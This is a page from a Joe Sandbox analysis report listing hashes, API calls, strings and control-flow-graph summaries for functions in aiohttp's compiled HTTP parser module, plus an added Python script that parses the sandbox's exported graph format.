• Opcode ID: 32d2d8ebaf427c9915a4c14e45b7913cd146b6d879e27b526b4b3a765f1a64f7
• Instruction ID: 0afebd9395481130e2dd6dabcea5760373902b981ba5268088ab2b8858b3a2d7
• Opcode Fuzzy Hash: 32d2d8ebaf427c9915a4c14e45b7913cd146b6d879e27b526b4b3a765f1a64f7
• Instruction Fuzzy Hash: 4411BFA0E0B603C1FF5EAB71EC652B56298AF54B56F4410B5CD1DC6290EE3FA44B8730

Control-flow Graph

Control-flow graph of the function starting at 7ffbaaf173d0 (graph rendering omitted; basic blocks 5936 to 6072 not reproduced). API calls reached along its paths: PyErr_SetString, _Py_Dealloc, PyErr_Occurred, PyErr_Format, PyObject_GetAttr.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Err_String
• String ID: 'NoneType' object is not subscriptable$Expected %s, got %.200s$aiohttp._http_parser.__pyx_unpickle_RawResponseMessage__set_state$object of type 'NoneType' has no len()$unicode
• API String ID: 2454408770-2005241057
• Opcode ID: c017620a9760a9442f8f73742133af3e48a736a1fd6c906f475f2f53871eb7e5
• Instruction ID: 22bf0d00cad47d8efe4c9b3898d59d7fba2cc48d41f045359c0775be40b90f0c
• Opcode Fuzzy Hash: c017620a9760a9442f8f73742133af3e48a736a1fd6c906f475f2f53871eb7e5
• Instruction Fuzzy Hash: 542261A5E0AA52C1FB5BAB35E95027527A8BB44B95F0440B2CF2D87794DF2FF4068730
APIs
Memory Dump Source
• Source File: 00000003.00000002.1954698041.00007FFBAA271000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBAA270000, based on PE: true
• Associated: 00000003.00000002.1954643232.00007FFBAA270000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.1958097857.00007FFBAA817000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.1959589060.00007FFBAA99D000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.1959795648.00007FFBAA9AB000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.1959841639.00007FFBAA9AC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.1959959397.00007FFBAA9B0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaa270000_stub.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
• Instruction ID: d6cec44ded242f2a34f506dd9a16dedbb96992083dcb87dff546f4e4375316e7
• Opcode Fuzzy Hash: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
• Instruction Fuzzy Hash: 9D114C62B55B01CAEB018F70E8442A833A8F719758F040E76EE6E86BA4DF7CD1568390

Control-flow Graph

Control-flow graph of the function starting at 7ffbaaf0bfe0 (graph rendering omitted; basic blocks 6073 to 6185 not reproduced). API calls reached along its paths: _Py_Dealloc, PyBytes_AsStringAndSize, PyErr_SetString, PyErr_Format, PyUnicode_DecodeUTF8, PyUnicode_Decode, PyObject_GetAttr, PyByteArray_Resize, PyTuple_New.
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Array_ByteErr_FormatResize$Tuple_
• String ID: 'NoneType' object has no attribute '%.30s'$'NoneType' object is not subscriptable$Expected %s, got %.200s$aiohttp._http_parser.HttpParser._process_header$aiohttp._http_parser.find_header$append$decode$surrogateescape$unicode
• API String ID: 879993430-1055671119
• Opcode ID: 39bea3a2f97f1619dd5661fbca9491245f5c4259de192382fe959cc27338d585
• Instruction ID: 68158d5083486759826427e2a159243626355c34e0d04142d178336084a53be9
• Opcode Fuzzy Hash: 39bea3a2f97f1619dd5661fbca9491245f5c4259de192382fe959cc27338d585
• Instruction Fuzzy Hash: B00262B5A0AA42D1EB5BAB31E8401B963A8FB44B95F5440B1CD2D977A4DF3EE4478330

Control-flow Graph (function entry 7ffbaaf0afc0)
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Err_FormatFromLongLong_Tuple_
• String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$B$$X$$]$$__reduce_cython__$aiohttp._http_parser.RawResponseMessage.__reduce_cython__$exactly$name '%U' is not defined$$
• API String ID: 1435629709-1486949237
• Opcode ID: 4edf90ac2fea01e43d0f43e2bb7282b1db1302653dd413ddb69e056aa68ed795
• Instruction ID: ebb7869c174ca8dea68117edf5f0aa087d61643a3a8f56d5aaabcb30ecbe06c9
• Opcode Fuzzy Hash: 4edf90ac2fea01e43d0f43e2bb7282b1db1302653dd413ddb69e056aa68ed795
• Instruction Fuzzy Hash: 8C0287A5A0AF46D1EB5A9F32E94027973A8FB44B81F0440B5CE5E97754EF3EE4528320

Control-flow Graph (function entry 7ffbaaf12ba0)
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Err_FromLong_Size_t$FormatOccurredState_ThreadUnchecked
• String ID: aiohttp._http_parser.cb_on_status$name '%U' is not defined
• API String ID: 3601060896-3180148171
• Opcode ID: e1818073de6947f094a44adc823b095d215a923775498d5ac8ef0b49592a4119
• Instruction ID: ed279ad5076f40e23e690e82f608e008c81ccb72772590e8d472f42b246afc99
• Opcode Fuzzy Hash: e1818073de6947f094a44adc823b095d215a923775498d5ac8ef0b49592a4119
• Instruction Fuzzy Hash: 880280B6A0AB42C1EA5A9F71E84427977A8FF84B94F0445B6CF5D87754CF3EE4068320

Control-flow Graph (function entry 7ffbaaf074b0)
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$List_Tuple_
• String ID: aiohttp._http_parser.RawRequestMessage.__repr__
• API String ID: 3363699560-1702197402
• Opcode ID: d9ccd240431896c1797dc9621f621b226959769d8367d0c53bfe330686c413cc
• Instruction ID: 050952e1520d4c2c3d63680d23b8627c0b32888d7b122db3668930d0fb3d1dae
• Opcode Fuzzy Hash: d9ccd240431896c1797dc9621f621b226959769d8367d0c53bfe330686c413cc
• Instruction Fuzzy Hash: 392270B6A0AF01C0EB1A9F35D8401B83368FB58BE9F1545B1DE1E97790DE3ED44283A0

Control-flow Graph
Graph summary (rendered graph not reproduced): basic blocks 6547-6626, 00007FFBAAF16FE0-00007FFBAAF173C5. Imported API calls: PyLong_FromLong, PySequence_Contains, _Py_Dealloc, PyList_New, PyObject_GetAttr, PyUnicode_Format, PyErr_Format. Intra-module calls: 7ffbaaf29db0 (block 6553, the handler that the failure exits funnel into via block 6550), 7ffbaaf278a0, 7ffbaaf27920, 7ffbaaf27060, 7ffbaaf173d0, 7ffbaaf27190. The PyLong_FromLong / PySequence_Contains entry sequence and the "Expected %s, got %.200s" string are consistent with a Cython-generated __pyx_unpickle_* helper (checksum membership test followed by an argument type check).
APIs
• PyLong_FromLong.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF1700B
• PySequence_Contains.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF1703A
• _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF170E5
• _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF1737A
• _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF17390
• _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF173A5
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$ContainsFromLongLong_Sequence_
• String ID: Expected %s, got %.200s$aiohttp._http_parser.__pyx_unpickle_RawResponseMessage$tuple
• API String ID: 356818705-1703308469
• Opcode ID: 5a7875f50d93554aef7a727bb4c4ee124748226878ca5dea524b4e3c5adc8d4c
• Instruction ID: 1b5b68518507751f43486c399d0fe34ace07714c93ce064d856334e4f2aef41a
• Opcode Fuzzy Hash: 5a7875f50d93554aef7a727bb4c4ee124748226878ca5dea524b4e3c5adc8d4c
• Instruction Fuzzy Hash: 64B170A5A0AA46C1FB5E5F32E8142796798BF45F95F0480B2CE1E97750DF3EE4038B20
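Joe Sandbox exports each of these graphs as a flat token stream (`control_flow_graph <id> <start>-<end> [API ...] [call <hex>] <a>-><b> ...`): `<id> <start>-<end>` opens a basic block, bare identifiers after it are the imported CPython API calls made in that block, `call <hex>` is a call to another function in the same module, and `<a>-><b>` is an edge. The Python below is an added example, not part of the Joe Sandbox report or of aiohttp, that parses that grammar into nodes and edges and answers the questions a triager asks of such a graph: which APIs the function touches, where it starts and ends, and which branch sequence reaches a given call. Its embedded input is the first 17 blocks of the __pyx_unpickle_RawResponseMessage graph above, copied verbatim; the grammar rules are inferred from this page, not taken from a published format specification, and the positional handling of the address token is an assumption that holds for every graph here.

```python
import re
from collections import deque

# First 17 basic blocks of the __pyx_unpickle_RawResponseMessage graph on
# this page, copied verbatim; the rest of the graph uses the same grammar.
SAMPLE_CFG = (
    "control_flow_graph 6547 7ffbaaf16fe0-7ffbaaf17017 PyLong_FromLong "
    "6548 7ffbaaf17029-7ffbaaf17044 PySequence_Contains 6547->6548 "
    "6549 7ffbaaf17019-7ffbaaf17024 6547->6549 "
    "6551 7ffbaaf17053-7ffbaaf17057 6548->6551 "
    "6552 7ffbaaf17046-7ffbaaf17051 6548->6552 "
    "6550 7ffbaaf1734f 6549->6550 "
    "6553 7ffbaaf17356-7ffbaaf1736e call 7ffbaaf29db0 6550->6553 "
    "6555 7ffbaaf17062-7ffbaaf17064 6551->6555 "
    "6556 7ffbaaf17059-7ffbaaf1705c _Py_Dealloc 6551->6556 "
    "6554 7ffbaaf170d1-7ffbaaf170dc 6552->6554 "
    "6566 7ffbaaf17380-7ffbaaf17383 6553->6566 "
    "6567 7ffbaaf17370-7ffbaaf17375 6553->6567 6554->6553 "
    "6560 7ffbaaf170e2-7ffbaaf170eb _Py_Dealloc 6554->6560 "
    "6558 7ffbaaf171ea-7ffbaaf1720a 6555->6558 "
    "6559 7ffbaaf1706a-7ffbaaf1707b PyList_New 6555->6559 6556->6555 "
    "6561 7ffbaaf1720c-7ffbaaf1720f 6558->6561 "
    "6562 7ffbaaf17211 PyObject_GetAttr 6558->6562"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")


def parse_cfg(text):
    """Parse the flat export into ({id: block}, [(src, dst), ...]).

    A block is {"start", "end", "apis", "calls"}. The address token is
    consumed positionally right after a block id (assumption: this is how
    the plugin always emits it), so it can never be mistaken for an id.
    """
    nodes, edges, current = {}, [], None
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif NODE_ID_RE.match(tok):
            lo, _, hi = tokens[i + 1].partition("-")   # "start-end" or "start"
            current = {"start": int(lo, 16), "end": int(hi or lo, 16),
                       "apis": [], "calls": []}
            nodes[int(tok)] = current
            i += 1
        elif tok == "call":                            # intra-module call target
            current["calls"].append(int(tokens[i + 1], 16))
            i += 1
        else:                                          # imported API name
            current["apis"].append(tok)
        i += 1
    return nodes, edges


def entry_node(nodes):
    """The block with the lowest start address is the function entry."""
    return min(nodes, key=lambda n: nodes[n]["start"])


def function_extent(nodes):
    """(lowest start, highest end) over all blocks."""
    return (min(b["start"] for b in nodes.values()),
            max(b["end"] for b in nodes.values()))


def api_summary(nodes):
    """Imported APIs in address order (deduplicated) and sorted call targets."""
    apis, calls = [], set()
    for n in sorted(nodes, key=lambda n: nodes[n]["start"]):
        apis.extend(a for a in nodes[n]["apis"] if a not in apis)
        calls.update(nodes[n]["calls"])
    return apis, sorted(calls)


def path_to_api(nodes, edges, api):
    """Shortest block sequence from the entry to the first block calling `api`
    (breadth-first search over the edges); None if no such block is reachable."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    start = entry_node(nodes)
    prev, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        if api in nodes[n]["apis"]:
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for nxt in succ.get(n, []):
            if nxt not in prev:
                prev[nxt] = n
                queue.append(nxt)
    return None


if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE_CFG)
    lo, hi = function_extent(nodes)
    apis, calls = api_summary(nodes)
    print(f"{len(nodes)} blocks, {len(edges)} edges, extent {lo:#x}-{hi:#x}")
    print("APIs:", ", ".join(apis))
    print("intra-module calls:", ", ".join(f"{c:#x}" for c in calls))
    print("entry -> first _Py_Dealloc:", path_to_api(nodes, edges, "_Py_Dealloc"))
```

Run against a full graph pasted from the report, `api_summary` gives the same API set that the Similarity "API ID" line abbreviates, and `path_to_api` shows which conditional exits have to be taken to reach an error-path call such as PyErr_Format, which is the quickest way to tell a library's normal cleanup from a branch worth reading in the disassembly.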

Control-flow Graph
Graph summary (rendered graph not reproduced): basic blocks 6627-6672, 00007FFBAAF157D7-00007FFBAAF15D0F. Imported API calls: _PyDict_GetItem_KnownHash, PyErr_Occurred, PyDict_New, PyDict_SetItem, PyErr_Format, _Py_Dealloc. Intra-module calls: 7ffbaaf25c40, 7ffbaaf25d60, 7ffbaaf29db0 (block 6643, target of the failure exits), 7ffbaaf26f20, 7ffbaaf32dc0. The dictionary lookup followed by PyErr_Format with "name '%U' is not defined" is the module-global name lookup that Cython emits.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Dict_$Err_$FormatHashItemItem_KnownOccurred
• String ID: aiohttp._http_parser.parser_error_from_errno$name '%U' is not defined
• API String ID: 1780638902-2115262026
• Opcode ID: e6c056b6ab8cdebde5a69bcf983fb647829455c43ee330c3c3eb23d1c8eebb02
• Instruction ID: 609ad4bcb6dfeaac13ad6175691795e9b6da91fd47968cef7d467f5750dba24e
• Opcode Fuzzy Hash: e6c056b6ab8cdebde5a69bcf983fb647829455c43ee330c3c3eb23d1c8eebb02
• Instruction Fuzzy Hash: 50515FA5E0BA46C1FA5A9F32E8401B86798FF45F95F4840B6CE5D97350DE2EE4478330

Control-flow Graph
Graph summary (rendered graph not reproduced): basic blocks 6674-6720, 00007FFBAAF0B810-00007FFBAAF0BB7A. Imported API calls: PyObject_Init, PyObject_GC_Track (block 6676, the object-construction path), _Py_Dealloc on the field-release paths. Intra-module call: 7ffbaaf29db0 (block 6684, reached from the failure exits at blocks 6702, 6711 and 6718).
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc$Object_$InitTrack
• String ID: aiohttp._http_parser._new_response_message
• API String ID: 3803614613-3861257606
• Opcode ID: 49d4f52b81de02b1e498f8b259fceaa06bfdc536de3bf34ca3d3053dbc308f90
• Instruction ID: 4a16b8676ac4b2915eb0e3b401e1e00a9cc94a673c96f1caedd8429a8ff36aa3
• Opcode Fuzzy Hash: 49d4f52b81de02b1e498f8b259fceaa06bfdc536de3bf34ca3d3053dbc308f90
• Instruction Fuzzy Hash: 52A10AB6A0AE16C1E71AAF36E8801787378FB54B96F144175CE5D93368DF3EE4528320

Control-flow Graph
• Function 7ffbaaf113e3 (basic blocks 7ffbaaf113e3-7ffbaaf11bbf; graph rendering omitted). Imported APIs referenced from the graph: PyDict_Size, PyErr_Occurred, PyObject_IsTrue. Internal calls: 7ffbaaf26480, 7ffbaaf2a130, 7ffbaaf2a1d0, 7ffbaaf29db0, 7ffbaaf32dc0, 7ffbaaf2bcb0, 7ffbaaf11c40.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dict_Size
• String ID: __init__$aiohttp._http_parser.HttpResponseParser.__init__
• API String ID: 1288431816-2665069032
• Opcode ID: 3de5ab0a6b543b37f0749c4b3a7f8ae53f4062ceb7ede6c9c00f8444f2cb14e4
• Instruction ID: b55ad447f283da4884b19e6188494fbf5f4a9bd8368914c10d986abca20dbfb2
• Opcode Fuzzy Hash: 3de5ab0a6b543b37f0749c4b3a7f8ae53f4062ceb7ede6c9c00f8444f2cb14e4
• Instruction Fuzzy Hash: EA918FB5B0AB01C5FF5A9B71E4401A92BA8FB45BA4F14027ADE6D83BD4DF3DD0428724

Control-flow Graph
• Function 7ffbaaf28820 (basic blocks 7ffbaaf28820-7ffbaaf28a29; graph rendering omitted). Imported APIs referenced from the graph: PyMem_Malloc, PyErr_NoMemory, PyTuple_New, PyMem_Free, PyDict_Next, PyErr_SetString, _Py_Dealloc. No internal calls.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Mem_$Err_FreeMallocMemoryTuple_
• String ID: keywords must be strings
• API String ID: 4138657551-2673384963
• Opcode ID: 2ad6c86c8ab959b5e402209c1c492fe9cb2ae27a522832f2cbb9f0e704cb74a7
• Instruction ID: 072c2abd7ddc9fac9044847b4b8aa43ebeae1fc10e9737146b6af63f09676f6f
• Opcode Fuzzy Hash: 2ad6c86c8ab959b5e402209c1c492fe9cb2ae27a522832f2cbb9f0e704cb74a7
• Instruction Fuzzy Hash: 7F518B7660AB85C1DA2A9F35E4542BAB3A8FB85FC5F444071CE9D87714DE3ED00AC360

Control-flow Graph
• Function 7ffbaaf11c40 (basic blocks 7ffbaaf11c40-7ffbaaf11eb9; graph rendering omitted). Imported APIs referenced from the graph: _Py_Dealloc, _PyDict_GetItem_KnownHash, PyErr_Occurred, PyObject_IsTrue, PyErr_Format. Internal calls: 7ffbaaf29db0, 7ffbaaf25c40, 7ffbaaf25d60.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Dealloc
• String ID: aiohttp._http_parser.HttpResponseParser.__init__$name '%U' is not defined
• API String ID: 3617616757-1353362044
• Opcode ID: 210f50c79fc7f3b2777ac102fc579b19980f51764e2b74a3bb64277221ec94e0
• Instruction ID: 79e3d4b2c3175cd9bcc2e55db2cf45fce1a8dcffcfb478e2edb20431962c914b
• Opcode Fuzzy Hash: 210f50c79fc7f3b2777ac102fc579b19980f51764e2b74a3bb64277221ec94e0
• Instruction Fuzzy Hash: 247151B5A0AB46C1EF5ADB35E8442B973A8FB94B80F14407ACE5D87750DF3EE4468320

Control-flow Graph
• Function 7ffbaaf0dff0 (basic blocks 7ffbaaf0dff0-7ffbaaf0e1df; graph rendering omitted). Imported APIs referenced from the graph: PyLong_FromLong, _Py_Dealloc. Internal calls: 7ffbaaf32dc0, 7ffbaaf29db0, 7ffbaaf27060.
APIs
• PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E075
• PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E097
• _Py_Dealloc.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E183
• _Py_Dealloc.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,00007FFBAAF0D4C9), ref: 00007FFBAAF0E1AD
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: DeallocFromLongLong_
• String ID: aiohttp._http_parser.HttpParser.http_version
• API String ID: 395642662-1245594736
• Opcode ID: 0676bbce45c6629fb22c9b04cfd82541de9437e0ee97f2613885e20116441b1c
• Instruction ID: d7254a7a08fcf464861c44be5e903868ae2041ca4ebbf81eba39e36cfe0064ce
• Opcode Fuzzy Hash: 0676bbce45c6629fb22c9b04cfd82541de9437e0ee97f2613885e20116441b1c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF51A5B2E0AA52D1EB5A9F35F85017973A8EF94B81F0840B1CE5D97758EF2ED4438720

Control-flow Graph (graph image not reproduced here)
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Err_$FormatObject_OccurredTrue
• String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$aiohttp._http_parser.HttpParser.set_upgraded$exactly$set_upgraded
• API String ID: 1155888492-3043789788
• Opcode ID: 5fa23940db4a5468b12f4a417c60fa5f7347dc21b4ff592f8d1a88be0150f99b
• Instruction ID: af6f9c48f857a233048ffeaf0861227dfa404c94c09765010b633ca4481974da
• Opcode Fuzzy Hash: 5fa23940db4a5468b12f4a417c60fa5f7347dc21b4ff592f8d1a88be0150f99b
• Instruction Fuzzy Hash: 3451ACB5A0AB42D1EB1AEF31E4405B967A8FB84B90F544072DE5D937A4DF3EE046C320

Control-flow Graph (graph image not reproduced here)
APIs
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
